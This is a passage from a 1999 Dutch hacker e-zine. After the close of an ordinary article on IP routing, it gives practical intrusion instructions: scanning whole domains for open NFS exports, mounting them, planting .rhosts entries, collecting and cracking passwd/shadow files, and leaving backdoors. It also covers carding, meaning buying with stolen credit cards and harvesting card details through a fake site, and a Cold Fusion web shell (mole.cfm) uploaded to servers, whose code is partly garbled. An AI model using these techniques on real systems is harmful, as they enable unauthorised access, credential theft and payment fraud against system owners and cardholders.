softwarematige implementatie brengt automatisch beperkingen op het gebied van snelheid met zich mee. Voor ieder binnenkomend IP-datagram moet de route-server namelijk in zijn routetabel een entry opzoeken die correspondeert met het IP-be- stemmingsadres. Voor elk binnenkomend IP-datagram op elke interface moet dat opnieuw gebeuren. Uiteraard is het een verhoudingsgewijs zeer tijdrovende zaak. Hoe tijdrovend hangt af van de snelheid van de ge- bruikte processor en van de omvang avn de route-tabel. De verwerkings- snelheid van het aantal IP-datagrammen vormt ook de beperking van een traditionele router. De maximale verwerkingssnelheid ligt momenteel op ongeveer een half miljoen zoekacties per seconde. Deze verwerkingssnelheid is voor veel van de huidige IP-netwerken voldoende, maar schiet naar verwachting in de toekomst te kort. In ieder geval geldt dat wanneer wordt vastgehouden aan de traditionele implementatiemethoden, er op korte termijn geen belangrijke verbe- teringen in de verwerkingssnelheid van IP-routers kunnen worden ver- wacht. Daarom is er momenteel een aantal nieuwe concepten voor IP-ne- werken in ontwikkeling, in te delen in drie klassen: de hoge snelheid- schakelconcept, de IP-labelschakelconcept en de adres-resolutieconcep- ten. De IP-routerconcepten Hoge snelheid IP-routers zijn zeer snelle opvolgers van traditionele IP-routers. Bij het ontwerpen van hoge snelheid routers vormt de ver- werkingssnelheid van IP-datagrammen een fundamenteel ontwerpcriterium. Kijken we naar de functionaliteit, dan is er geen verschil. Naar de 'buitenwereld' hanteren zij dezelfde IP-protocollen. Het voor- deel van deze oplossing is derhalve dat bestaande netwerkontwerpen gehandhaafd kunnen blijven. De hoge snelheid IP-routers worden in twee typen onderscheiden, die beide al commerciëel verkrijgbaar zijn: de zogenaamde laag-3 schake- laars en multigigabit routers. LAAG-3 SCHAKELAARS De ontwerper van een laag-3 schakelaar kan uit een aantal technieken kiezen im het forwardingsproces door de router te versnellen. Zo kan het opzoeken van de routers in de route-tabel hardwarematig in plaats van softwarematig worden uitgevoerd. Dit komt de verwerkingssnelheid ten goede. Ook kan op elke interfacekaart een aparte processor worden geïmplementeerd voor het uitvoeren van het forwarding-proces. Er zijn nog meer mogelijkheden. Toepassing van deze oplossing kan resulteren in een verwerkingssnelheid die tot enkele miljoenen IP-datagrammen per seconde kan oplopen. MULTIGIGABIT ROUTERS Multigigabit routers lijken in veel aspecten op laag-3 schakelaars. Een verschil is echter dat laatstgenoemde uitgevoerd is met een gedeelde bus als switching device, terwijl eerstgenoemde over een volledige schakelmatrix beschikt, die geïmplimenteerd is in de IP-router. De IP-schakelconcepten Bij de IP label-schakelconcepten bevatten de IP-routers tevens label- schakelfaciliteiten en worden daarom ook wel aangeduid als label- switches. Alhoewel in dit artikel wordt uitgegaan van ATM-schakel- faciliteiten, zijn de concepten ook van toepassing op andere label- schakel technieken, zoals Frame Relay. In die delen van IP-netwerken waarin labelswitches zijn toegepast, kunnen traditionele IP-paden door ATM-verbindingen worden kortgesloten. Vervolgens kunnen IP-routers aan de rand van het IP-label-schakelnet- werk de binnenkomende IP-datagrammen toewijzen aan een ATM-verbinding. De datagrammen worden daarna op ATM-niveau door de kern van het netwerk getransporteerd zonder dat daarbij op tussenliggende punten IP-forwar- ding plaatsvindt. Het uitvoeren van het IP-forwardingproces in de kern van het netwerk wordt hiermee kortgesloten en teruggebracht tot het schakelen van ATM-cellen. Zoals eerder is betoogd kan dit schakelen van ATM-cellen met hoge snelheid gebeuren. Binnen de IP label-schakel concepten spelen momenteel twee technieken een hoofdrol: de flow-gebaseerde en de topologie-gebaseerde label-scha- keltechnieken. De technieken onderscheiden zich in de manier waarop de label-switches ATM-verbindingen definiëren en vervolgens binnenkomende IP-datagrammen toewijzen aan deze ATM-verbindingen. FLOW-GEBASEERDE LABEL-SCHAKEL TECHNIEKEN Bij deze technieken worden ATM-verbindingen opgezet door individuele, 'grote' IP-stromen. IP-switching is momenteel de bekendste flow-gebaseerde label-schakel- techniek. Bij deze techniek worden door de IP-switches individuele 'grote' IP-stromen gedetecteerd. Voor zo'n stroom wordt vervolgens een ATM-verbinding opgezet door het toekennen van een label. Door middel van voor IP-switching specifieke signaleringsprotocollen maakt de IP-switch dit aan de aangrenzende IP-switches kenbaar. Deze kunnen op hun beurt de IP-stroom op basis van de aangemelde VPI/VCI- combinatie als ATM-verbinding doorschakelen. Met dit 'doorgeef'-effect wordt van begin tot eind een aparte ATM-verbinding gerealiseerd voor iedere gedetecteerde IP-stroom. Er wordt geclaimed dat ongeveer 80% van het IP-verkeer in grote IP-netwerken wordt herkend als behorende tot zo'n 'grote' IP-stroom. Verkeer dat niet als 'grote' IP-stroom wordt herkend, wordt door de IP-switches op de traditionele wijze behandeld en op basis van IP-forwarding door het netwerk getransporteerd. Het IP-switching protocol is door de Internet Engineering Task Force (IETF) gestandaardiseerd en IP-switching produkten zijn al commercieel ver- krijgbaar. TOPOLOGIE-GEBASEERDE LABEL-SCHAKEL TECHNIEKEN Bij deze technieken worden vooraf ATM-verbindingen geconfigureerd, die de verschillende routes door het IP-netwerk representeren. Tag-switch- ing is een veelbesproken techniek die onder andere topologie-gebaseerde label-schakelen ondersteunt. Hierbij zal tussen elke eerste en laatste tag-switch van het netwerk een ATM-verbinding gerealiseerd worden. Dit gebeurt vooraf, ongeacht of en wanneer IP-datagrammen tussen deze locaties zullen worden verzonden. Ieder binnenkomend IP-datagram wordt aan de rand van het tag-switching netwerk aan de juiste, reeds be- staande ATM-verbinding toegewezen. Het datagram wordt vervolgens door het netwerk vervoerd zonder dat een tussenliggende tag-switch nog IP- forwarding plaatsvindt. In vergelijking met het continue, flow-geba- seerde opzetten van ATM-verbindingen, kan het vooraf, topologie-geba- seerde opzetten van ATM-verbindingen het aantal benodigde ATM-verbin- dingen beperken en de druk verlichten die het opzetten van ATM-verbin- dingen op het netwerk legt. Tag-switching bevindt zich momenteel in het IETF-standaardisatieproces. De eerste tag-switching produkten werden aan het einde van 1997 op de markt gebracht. (Bron: Vakidioot van Universiteit Utrecht April 1999) naam: Maniac email: 0holster01@flnet.nl homepage: www.flnet.nl/~0holster01 -------------------- 09. NFS server scan -------------------- NFS server scan. -updatet 12-4-99 for H4H- Methode is in andere vorm ook toepasbaar op andere mountable spullen. -kwestie van verbeelding- by Nikkita special thnx to: Mata_Hari, C00lvibes, Hardbeat, Ossie & Na‹ef Document mag vrijelijk verspreid worden mits je naam en bron maar vermeldt. Geschreven voor NHM'98 -t.b.v. demonstratie- Ik heb document upgedate omdat het mij irriteerde dat bewerken van grote tabellen hier niet goed in beschreven was. Onder Unix en zeker Linux is het heel gemakkelijk om grote tabellen te bewerken, in vorige versie van document heb ik dat niet uitgezocht omdat ik zat met een grote tijdsdruk -i.v.m. organiseren van NHM- hierdoor heb ik snel een document in elkaar gerost die voornamelijk uit cut & paste bestond, in Linux en de functies en script mogelijkheden heb ik me toen niet in verdiept, nu dat we een paar maanden verder zijn heb ik e.a. bij geleerd en kan je nu vertellen hoe je -voor welk doel dan ook- grote tabellen kunt bewerken, en dat dit snel & beter gaat dan onder Windows -Excel b.v.- zul je merken/gemerkt hebben als je .de of .nl domein probeert te bewerken, en er achterkomt dat Windows wel erg slecht tegen bestand kan die meer dan 65K aan rijen heeft :) Ook zal vanaf nu dit document een standaard stuk worden voor alles wat ik hierna nog schrijf, ik zal in de toekomst verwijzen naar dit document, zodat vragen over hoe je bestanden moet bewerken onder Linux overbodig worden. Ingredi‰nten: Linux/Unix shell Authoritive DNS server -die je toestaat queries te draaien- NSLOOKUP Doel: Shell vinden en indien nodig/mogelijk Root Hacken Nu zijn de bovenstaande redenen niet echt mijn bedoelingen, omdat iemand die enige Unix/Linux kennis heeft dit gehele document zelf wel had kunnen bedenken.. Met dit document probeer ik te bereiken dat mensen gaan inzien dat je door combineren van verschillende methodes, tools en met een beetje scripten je een heel eind kan komen. Het gaat er met name om dat je inzicht hebt, des te ruimer je blik op de verschillende mogelijkheden van diverse Os'en des te meer mogelijkheden er zijn. Het begin: Om een NFS volume te vinden moet je erg veel IP -systemen- controleren (scannen), omdat je niet gaat zoeken op ip's die er niet zijn etc..etc.. lees je een DNS uit, een DNS is niks anders dan een DATABASE waarin alle namen met IP in staan. In een vervolg document zal ik een pingtest in perl beschrijven zodat je ze eerst IP's kan pingen om te zien of ze echt online zijn alvorens een scan -wat voor scan dan ook- uit te voeren, met name wutest wil wel eens in een wachtlus blijven hangen als IP down blijkt te zijn. Als jij ergens een DNS invult dan vraagt hij aan een DNS server naar de bijbehorende IP en kan hij er heen. Je kunt nu -onder Linux- op 2 manieren lijsten genereren: HOST NSLOOKUP Mijn persoonlijke voorkeur gaat uit naar NSLOOKUP omdat je dan zeer gemak- kelijk van nameserver kan wisselen, immers de ene nameserver is de andere niet -restricties e.d.- , ook kom je soms een nameserver tegen binnen een domein, het kan soms wenselijk zijn om deze uit te lezen om zo machines binnen het domein te vinden, die misschien niet op de externe nameserver terug te vinden zijn. Afgezien van bovenstaande kun je met HOST zeer gemakkelijk lijsten genereren die makkelijker te verwerken zijn. Hieronder een voorbeeld met NSLOOKUP: $ nslookup ; heb je ook onder WindowsNT Default Server: ns.xxxxxx.net ; mijn isp niet :) Address: 195.256.9.18 > set q=ns ; query naar nameservers > pl ; PL domein = Polen Server: ns.xxxxxx.net Address: 195.256.9.18 Non-authoritative answer: ; servers waar je niks aan hebt pl nameserver = SUNIC.SUNET.SE pl nameserver = NMS.CYFRONET.KRAKOW.pl pl nameserver = DNS2.TPSA.pl pl nameserver = BILBO.NASK.ORG.pl pl nameserver = COCOS.FUW.EDU.pl Authoritative answers can be found from: ; servers die je kan gebruiken SUNIC.SUNET.SE internet address = 192.36.125.2 NMS.CYFRONET.KRAKOW.pl internet address = 149.156.2.101 NMS.CYFRONET.KRAKOW.pl internet address = 149.156.1.3 DNS2.TPSA.pl internet address = 194.204.152.34 BILBO.NASK.ORG.pl internet address = 148.81.16.51 COCOS.FUW.EDU.pl internet address = 148.81.4.6 > server 148.81.4.6 ; verander van DNS server Default Server: cocos.fuw.edu.pl Address: 148.81.4.6 > ls -d pl > pl ; gooi alle op .pl eindigende DNS entries naar bestand pl [cocos.fuw.edu.pl] ########################################################################## ###### ########################################################################## ###### ########################################################################## ###### ################ Received 12802 records. En klaar is kees, als je de bestand pl bekijkt zul je zien dat het een bende is waar je nog niks meekan, cat foo| awk '{ print $3 }'| grep -v [a-z]| awk ' BEGIN {i=0} { i=i+1; print "showmount -e " $nf " &" } END {print "Done! Ik heb " i " regels voor jouw plezier gedaan :-)"}' > foo |tail -f foo HOST is erg gemakkelijk te gebruiken, helemaal als je meerdere dingen wilt uitvoeren met output van HOST. Kijk ook eens naar HOST -l -v -t any rutgers.edu -of whatever- je krijgt een lijst met alle nameserver info, met name TXT en HWINFO kunnen erg han- dig uitkomen. Maar voor onze doel doen we HOST -l foo host -l foo| cut -d " " -f4|sort|uniq|awk ' BEGIN {i=0} { i=i+1; print "showmount -e " $nf " &" } END {print "Done! Ik heb " i " regels voor jouw plezier gedaan :-)"}' > foo |tail -f foo of for d in `host -l foo |cut -d " " -f4| sort -u| grep -v [a-z] ` ; do echo showmount $d '&' ; done > foo BTW: Showmount moet je al root uitvoeren, en als hij er nog niet opstaat moet je eerst nfs installeren. doe een chmod +x foo script executable te maken en voer hem als volgt uit ./pl.txt > outputnfs -or whatever- Nu zul je erg veel foutmelding e.d. voor bij zien schieten -portmap errors etc..etc..- niet op letten. Zodra hij klaar is zal je in die outpunfs file waarin dingen zoals -hij loopt niet meer effe 1 keer op enter drukken- $ cat ploutput |less Export list for 195.116.109.137: /cdrom 192.124.116.5 Export list for 195.116.161.163: / backlix.merinosoft.com.pl Export list for 195.116.161.163: / backlix.merinosoft.com.pl Export list for 195.117.175.126 /vol/ftp/pub (everyone) /usr/local/samba (everyone) /cdrom (everyone) /slakware (everyone) waarna je moet zoeken naar everyone's en mountpoints als / of /home # mount 195.117.175.126:/usr/local/samba /mnt # cd /mnt # ls bin lib private var Je kunt zodra je een mountpoint hebt meerdere dingen doen afhankelijk of je ook schrijfrechten kun je iets wel of niet, overigens wil het helemaal niet zeggen dat je perse schrijfrechten nodig hebt. Hier onder enkele voorbeelden van wat je kan doen Met dank aan Hardbeat: De voorwaardes van echo + + > .rhosts truc. in.rshd of in.rlogind (TCP poort 514/513) moet openstaan soms moet de host waar je vandaan komt ook in /etc/hosts.equiv staan en hosts.allow/deny moeten niet in de wegzitten daar komt bij dat een + + in root's .rhosts in de nieuwere versies van de daemons gewoon genegeerd wordt, vaak met melding in syslog beter is dan echte parameters op te geven, die minder verdacht lijken fijnste is als je al shell xs hebt op de bak, als gewone user dan kun je die met localhost in de .rhosts gooien localhost staat ook vaak al in /etc/hosts.equiv :) Voorbeeld uit praktijkervaring: toegang op een server was al verkregen door: - lek cgiscriptje (user nobody) - bekend ftpwachtwoord (normale user) echter geen shellxs als die user ftp zat van buitenaf dicht via 't cgitje met een stukje vernuftige shellcode+telnet een .rhosts geupload en dan vanuit 't cgitje rsh localhost blah blah blah doen oftewel, shellxs als de user (kwestie van analytisch vermogen :) Overigens is NFS+ .rhosts combinatie integenstelling wat je zou verwachten best wel intressant. Voordat je het weet heb je een nameserver van KPN te pakken, maar in andere gevallen gaat het veelal om verkeerd geconfigureerde exports, en is het op zijn plaats om beheerder effe te mailen en te waarschuwen. Indien hij niets er aan doet kun je actie ondernemen, en als hij dan nog niks dicht timmert.........tja..... :) Wat je ook kunt doen is op de meest basic manier te werk gaan Je gaat opzoek naar passwd & shadow of andere dingen waarin je password kunt vinden, [root@XXXXX /mnt]# cd private [root@gXXXXX private]# ls private smbpasswd smbpasswd~ [root@XXXXX private]# of NFS (mountd)-exploits runnen, en je hebt -als je geluk hebt root.- Met onderstaande commando's kun je indien je ergens root mount vind de password bestanden vinden. $ ls / -R |grep passwd $ ls / -R |grep shadow Met een portscan of telnet kun je zien of de door jouw gehackte machine telnet heeft. accountvaniemand::0:0::/:/bin/sh indien zoiets in passwd file staat heb je er alleen iets hebt als je de shadow file ook hebt, standaard heet hij shadow en staan beide bestanden in /etc/ maar dit hoeft niet zo te zijn. accountvaniemand:DwqFDdwSSRewFa:0:0::/:/bin/sh indien hij er zo uit ziet dan heb je een unshadowed of een fakepassword file te pakken. Cracken van passwords: Ga naar astalavista.box.sk en zoek naar John The Ripper download dat proggie. draai unshadow passwd shadow > unshadowed ; ook indien je een gedeelte van shadow hebt (door coredump of exploit) zal unshadowd crypted passwords bij de juiste accounts zetten. john -single unshadowed en je zal wat passwords krijgen john zonder parameter geeft de opties op die meer passwords kunnen opleveren, lees ook de meegeleverde documentatie. Zodra je wat accounts met password hebt kun je een portscan of telnet zien of de door jouw gehackte machine telnet heeft. Indien je volledige controle over een machine hebt -root shell b.v.- wees dan sportief en mail de beheerder dan, ze zullen dan wel het systeem dicht gooien, maar als je het goed hebt gedaan heb je er achterdeurtjes in laten zitten. :) Suc6 Gerrie The Happy Prutser http://www.hit2000.org BTW: ik raad iedereen om eens een stukje te schrijven, je komt dan aan dingen toe die je normaal gesproken links zou liggen, in totaal heeft de bewerk functies mij 4 a 5 uurtjes gekost maar dat was het beslist waard, nu ken ik tenminste de kracht van awk, cut & grep waarderen en toepassen! En de tijdwinst heb je in no time terug verdiend Je leert dus altijd door te prutsen :) ------------ 10. Carding ------------ (Redactie: Deze info is alleen omdat sommige mensen wilden weten wat carding inhield. Carding is bij de wet verboden. Wat je met deze in- formatie doet is geheel voor je eigen verantwoordelijkheid. Tevens wordt dit gedaan door zogenaamde carders en heeft het niks met hack- en te maken) Een mooie hobbie, die door een aantal mensen beoefend word, is het zo- geheten'carding' Nou hoef ik jullie geheid niet meer uit te liggen wat het ben, (doe ik toch), maar het is dus dat je met iemand anders zijn Creditcard (of eentje die je zelf gegenerated hebt maar dat lukt toch nooit) allemaal mooie spulletjes besteld, toegang krijgt tot sexsites, enzovoorts enzo- voorts. Het idee is dus heel simpel: 1. zorg dat je een kaart krijgt 2. zoek een site waar je iets kan bestellen en bestel dat Nou, dat klinkt makkelijk he? Maar ja, het valt dus een klein beetje tegen (damn!) . . . Hoe kom je bijvoorbeeld aan  en creditcard nummer? Nou, de mensen die net zo goed zijn als Zero Cool kunnen natuurlijk gewoon bij de credit- card maatschappij inbreken, maar dit was toch iets meer bedoeld voor echte mensjes... Je kan natuurlijk een (zo duur mogelijk) restaurant gaan zoeken, en tussen de ofval naar bonnetjes gaan zoeken als je daar zin in hebt(of er gaan werken haha), maar er zijn ook manieren waarbij je niet je ver- touwde zolderkamertje hoeft te verlaten en waarbij je niet vies wordt. (of moe) Zo kan je bv in nieuwsgroepen als alt.2600.cardz op zoek gaan naar mensen die je een paar nummertjes+info willen verkopen (zo'n 50 dollar per stuk geloof ik), of zelf iets moois bedenken. Een voorbeeld- je van dt laatste las ik laatst ergens: Een gozer had een sex site gemaakt, zag er heel gelikt uit enzow, en die gaf dan gratis memberships weg aan de eerste 100 leden(of zoiets). Nou, er waren mensen die dat wel leek, die vulden netjes hun info in, kregen een server error, en dachten 'shit'. Je kan zelf wel bedenken wat er met de ingevulde info gebeurd is . . . . Nou, ik wil jullie creatieve geest niet verspillen met voorgekauwde ideeen, dus voel vrij om zelf ook iets te bedenken . . . Nou, dan kom ik volgende keer met deel twee: Waar sturen we het heen? (alvast een tipje van de sluier: niet naar je eigen huis) bron: vooral alt.2600.cardz, en wat ik me zo vaag herinner uit een phrack (http://www.phrack.com) Avatar email: xxx-password@usa.net ICQ#: 23578830 ---------------------------- 11. Aanvulling Cold Fusion ---------------------------- Aangezien veel mensen nog niet helemaal door hebben hoe Cold Fusion hier nog een aantal opmerkingen. Bij het uploaden van mole.cfm wil Cold Fusion wel eens een andere naam geven aan mole.cfm. Deze naam is dan te zien aan het eind van de URL die dan in beeld komt. Gebruik dan deze naam in plaats van mole.cfm om de harde schijf te bekijken. Ik ben namelijk een server tegengekomen waar ik wel 30x mole.cfm onder een andere naam ben tegengekomen. En zo wordt het een beetje een zooitje en dat willen we natuurlijk niet. Tevens heeft drgenius speciaal voor H4H mole.cfm zodanig aangepast dat je nu ook directories kunt maken en verwijderen. Hiervoor moet je wel twee extra bestanden uploaden, maar dat moet geen probleem zijn. Je hebt nu de bestanden mole2.cfm, rd.cfm en md.cfm. Alles werkt gewoon via de mole2.cfm. Om een directory te maken moet je het hele pad intikken. Bijvoorbeeld: c:\inetpub\scripts\asby. Mole2.cfm: File uploaded

File deleted

#DirPath#
Name Size Modified date
[#Type#] #Name# #Size# #DateLastModified#



Rd.cfm:

#Form.Deletedir#

deleted
Md.cfm:

#Form.Createdir#

created
Asby(post@hackers4hackers.org) --------------------- 12. Ditjes en datjes --------------------- Stoplichten deel 2 Op mijn vraag uit H4H deel 1 is het volgende uitgerold: - Stoplichten zitten niet op een landelijk netwerk - Meeste stoplichten worden per kruispunt geregeld - Echter in sommige steden kan de brandweer de stoplichten op afstand regelen. Dus er bestaan wel kleine netwerken van stoplichten. Er waren ook een paar mensen die me vertelden dat sommige bussen met een apparaatje de stoplichten op groen konden zetten. Dit lijkt mij onwaarschijnlijk, maar wie weet hier meer over? En wie weet er meer over de kleine netwerken van stoplichten, die de brandweer op afstand kan bedienen? Asby (post@hackers4hackers.org) Wij willen op onze site een links lijst maken met allerlei interessante links. Hiervoor hebben wij dus ook interessante links voor nodig. Dus stuur je bookmarks op naar ons, zodat wij een mooie lijst kunnen maken. Verdeel aub wel de bookmarks in groepen en gooi ze niet dwars door elkaar, want dan moeten wij dit allemaal weer uitzoeken. Zet er ook bij wat er te zien is op de pagina en waarom ie interessant is. Bookmarks moeten wel allemaal verwijzen naar technische sites. En alsjeblieft geen warez-sites... Zo kunnen jullie, als jullie allemaal meewerken natuurlijk, later makkelijk en snel de site zoeken waarover je informatie zoekt. Asby (post@hackers4hackers.org)